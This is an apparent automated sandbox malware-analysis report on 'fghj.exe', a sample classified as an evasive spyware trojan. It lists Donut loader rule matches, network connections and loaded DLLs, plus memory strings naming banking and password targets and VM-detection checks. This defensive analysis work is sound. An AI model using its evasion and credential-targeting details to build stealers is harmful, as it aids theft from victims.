              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: fghj.exe, 00000000.00000003.1565827334.0000000003AED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49872 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49889 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4FE8D NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A88F2
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A7A3B
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A7619
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A8010
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A827C
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A70B2
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A6EB0
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A86AA
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A7EFA
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A8AFF
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A86F6
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A70D7
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A873A
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003AA13E
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A6F23
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A7911
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A836A
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A774E
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A7998
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A899E
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0038B
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4FE8D
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B390A5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3609B
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B00000
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B07195
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3F185
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B371E5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0A1D5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B05175
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B23145
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B132BD
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1F3A5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2A398
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4C38D
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1A351
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B234B5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4B499
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3F4C5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0C405
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3B475
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B06455
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B37445
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2D51A
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B32555
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0E55A
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1A545
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1F6E5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B076E5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4D635
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B16655
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3D65A
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1C7A5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B327C5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1B765
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1D768
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B04755
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4C75D
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B228B5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1F8F5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3F835
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2D82C
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B28875
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B379F5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B07A95
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0AAC5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1CA05
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B38A05
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B20A05
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B19A09
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B4CB95
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B05B25
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B09B15
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1ECB5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B08CF5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B18C19
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B30C45
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3AD95
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B37D75
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0BE91
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3EE85
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B13EF5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B17E40
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2DFAC
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B1EF95
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B21FD5
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0AF35
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2DF34
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B07F25
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B28F63
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B0EF6D
              Source: C:\Users\user\Desktop\fghj.exe | Code function: String function: 00B16645 appears 69 times
              Source: C:\Users\user\Desktop\fghj.exe | Code function: String function: 003A140D appears 31 times
              Source: C:\Users\user\Desktop\fghj.exe | Code function: String function: 00B09815 appears 75 times
              Source: fghj.exe | Static PE information: invalid certificate
              Source: fghj.exe | Binary or memory string: OriginalFilename vs fghj.exe
              Source: fghj.exe | Binary or memory string: OriginalFilenameFlashUtil.exeh$ vs fghj.exe
              Source: fghj.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B00A9B CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A5B70 LoadLibraryW,GetLastError,FindResourceW,GetLastError,LoadResource,GetLastError,SizeofResource,LockResource,GetLastError,FreeResource,FreeLibrary
              Source: fghj.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\fghj.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: fghj.exe, 00000000.00000003.1539126107.00000000039C5000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1551811830.00000000039EC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: fghj.exe | Virustotal: Detection: 66%
              Source: fghj.exe | ReversingLabs: Detection: 60%
              Source: fghj.exe | String found in binary or memory: http://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_
              Source: fghj.exe | String found in binary or memory: CodeSignLogFileCodeSignRootCertSHGetFolderPathWShell32.dllGetSidSubAuthorityCountGetSidSubAuthorityGetTokenInformationOpenProcessTokenAdvapi32.dllNativeCacheFlash PlayerAdobejoey32iconmetaactivexplugindrmunbrokerplayerdlmforcehelpupdatemaintainuninstallmsiinstallembeddingFlashInstall.logmms.cfgInstallVectorherren 1033;cs 1029;de 1031;es 3082;fr 1036;it 1040;ja 1041;ko 1042;nl 1043;pl 1045;pt 1046;ru 1049;sv 1053;tr 1055;zh_Hans 2052;zh_Hant 1028;lRegServerviv-iv pl_sgn.zax_sgn.zhttp://fpdownload.macromedia.com/get/flashplayer/update/current/install/install_all_win_.dir{FEC7EF28-53E7-4f06-8F56-FA6D670C8D3C}{0697F55F-F461-46fc-BABA-6D27CC032A75}.dll.PostfixCommandLine" "PrefixCommandLineFlashMacromed0
              Source: C:\Users\user\Desktop\fghj.exe | File read: C:\Users\user\Desktop\fghj.exe
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: mscoree.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: webio.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: wbemcomn.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\fghj.exe | Section loaded: ondemandconnroutehelper.dll
              Source: fghj.exe | Static file information: File size 3206904 > 1048576
              Source: fghj.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2aec00
              Source: fghj.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: fghj.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: Morpheme.pdb source: fghj.exe
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_003A693D LoadLibraryW,GetProcAddress
              Source: fghj.exe | Static PE information: real checksum: 0x3346ba should be: 0x31e852
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3B125 push eax; mov dword ptr [esp], F5F6F708h | 0_2_00B3B133
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B2469D push esp; iretd | 0_2_00B2469E
              Source: C:\Users\user\Desktop\fghj.exe | Code function: 0_2_00B3DB45 push eax; mov dword ptr [esp], E1E0FF2Eh | 0_2_00B3DB47

              Hooking and other Techniques for Hiding and Protection

              Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon756.png
              Source: C:\Users\user\Desktop\fghj.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\fghj.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\fghj.exe TID: 7536Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fghj.exe TID: 7548Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\fghj.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: fghj.exe, 00000000.00000002.1613869748.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: fghj.exe, 00000000.00000003.1512865936.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1613112719.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A12000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696497155p
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696497155f
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: fghj.exe, 00000000.00000003.1550995965.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
